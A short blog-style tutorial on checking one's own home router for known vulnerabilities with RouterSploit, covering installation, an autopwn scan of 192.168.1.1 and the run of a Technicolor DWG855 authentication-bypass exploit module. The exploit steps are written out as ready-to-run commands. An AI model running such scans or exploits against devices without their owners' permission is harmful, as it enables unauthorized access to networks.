We will never say it enough, security and privacy are important. But what if your router has an old firmware and is vulnerable to some common exploits?
One easy way to test it: RouterSploit. If you are familiar with the well know MetaSploit, it is more or less the same. It’s some kind of a toolkit containing lots of scripts that can run exploits.
You just need any Linux to test it, I did it with GNURoot on my Android phone.
Install Git and Python of not already done):
sudo apt install git-core sudo apt install python-dev python-pip libncurses5-dev git
Then, let’s clone the code on your local machine:
cd ~ git clone https://github.com/reverse-shell/routersploit
And run RouterSploit:
cd routersploit sudo python ./rsf.py
Now we can check if our router is vulnerable:
use scanners/autopwn set target 192.168.1.1 run
In front of each known vulnerability, you will see a red minus sign (to say not vulnerable) or a green plus sign (vulnerability found). In my case :
So let’s run this exploit:
use exploits/routers/technicolor/dwg855_authbypass set target 192.168.1.1 run
Happy hacking! 🙂